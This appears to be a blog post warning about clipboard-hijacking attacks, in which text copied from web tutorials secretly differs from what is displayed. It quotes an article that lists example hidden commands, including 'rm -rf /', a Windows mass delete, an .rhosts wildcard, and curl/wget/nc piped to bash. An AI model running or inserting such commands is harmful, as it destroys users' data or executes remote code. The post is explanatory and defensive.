Copy Paste Tricks back to their old tricks again

Copy Paste Tricks back to their old tricks again

In an article on The H, they explain why it’s not good to simply copy and paste stuff you get from a website tutorial. What seems like a harmless command could be hiding something very dangerous.

When a user pastes what they think is an innocent command that does what the page they pasted it from advertises, another command is actually executed with their credentials automatically. This could delete all of their data or send them to a server on the public internet. If the user is still authenticated with sudo on a Linux machine, the command could even be executed with administrator privileges which could lead to much more dangerous results.

See the article here

User iteraction based exploitation: WYSINWYC (What you see is not what you copy)

When working with computers you know if there is or not a reliable and deterministic way to exploit them, ineed when working with humans there’s no certezza. Technical people often prefear to stay technical and avoid humans. This is infact our first article witch need direct human iteraction to work.

The presented technique relay on a special type of “rich text”  copy where the apparently inncuos payload is pasted in a different context able to parse it. This is especially true, but definitely not limited to, online how-to.

The core concept of the attack is that the displayed text (and thus the data the user thinks to have copied) is different from what the browser have in realy copied.

A list of real life example follows, just to give you an idea.

Small commands:

rm -rf /
del /F /S /Q * # windows
/opt/custom/app abuse_my_functionality
echo "*" > ~/.rhost

Remote storage over http

wget -q -O-|bash
curl -s|bash
echo -en "GET /\n\n"|nc 80|bash

The shortest that comes to my mind is “GET|sh” (13 chars).

Other remote storage fetch methods

dig AXFR @evil-dns-with-53-tcp # since zone transfers use TCP

As you can see small commands are limited in terms of flexibility and remote fetch/exec can be made useless by network protections (egress filtering, my-work-is-grep ids) and configuration issues (missing  routing, machine offline, personal firewall, etc).

Excerpted from an article on


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s